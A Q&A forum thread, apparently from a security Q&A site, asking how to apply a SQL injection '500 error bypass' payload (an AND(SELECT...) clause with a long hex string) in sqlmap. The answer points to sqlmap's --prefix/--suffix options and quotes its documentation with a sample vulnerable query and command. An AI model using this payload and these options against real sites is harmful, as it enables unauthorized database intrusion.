# How too use R0b0tPirates 500 error bypass

Tags: sql-injection, sqlmap

I had a  valid injection, but could not exploit it due to 500 errors, so I looked around and found that R0b0t Pirates, a blog that specializes in tools like sqlmap, has put out a
[500 error bypass](http://robotpirates1337.blogspot.com/2012/09/sql-injection-bypassing-500-error.html), telling you somehow add this to the query, with no information but a title:

```
+AND(SELECT 1)=(SELECT 0X41414141414141414141414141414141414141414141414141414141414141414141414141414141
4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+
```

My question is how you add this to the query. Do you add it as a prefix, a sufix, a regex?

Comment: Are you using sqlmap or are you pwning manually?

Answer (score 1):

The "Custom Injection Payload" section of the [SQLMap Documentation](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
explains how to add a bypass like this.  It seems to me you would use `--suffix` followed by the AND clause you pasted above.

Here is the text from the docs:

> **Custom injection payload**
>
> Options: `--prefix and --suffix`
>
> In some circumstances the vulnerable parameter is exploitable only if
>   the user provides a specific suffix to be appended to the injection
>   payload. Another scenario where these options come handy presents
>   itself when the user already knows that query syntax and want to
>   detect and exploit the SQL injection by directly providing a injection
>   payload prefix and suffix.
>
> Example of vulnerable source code:
>
> ```
> $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
> ```
>
> To detect and exploit this SQL injection, you can either let sqlmap
>   detect the boundaries (as in combination of SQL payload prefix and
>   suffix) for you during the detection phase, or provide them on your
>   own.
>
> For example:
>
> ```
> $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" \
> -p id --prefix "')" --suffix "AND ('abc'='abc"
> [...]
> ```
>
> This will result in all sqlmap requests to end up in a query as
>   follows:
>
> ```
> $query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
> ```
>
> Which makes the query syntactically correct.
>
> In this simple example, sqlmap could detect the SQL injection and
>   exploit it without need to provide custom boundaries, but sometimes in
>   real world application it is necessary to provide it when the
>   injection point is within nested JOIN queries for instance.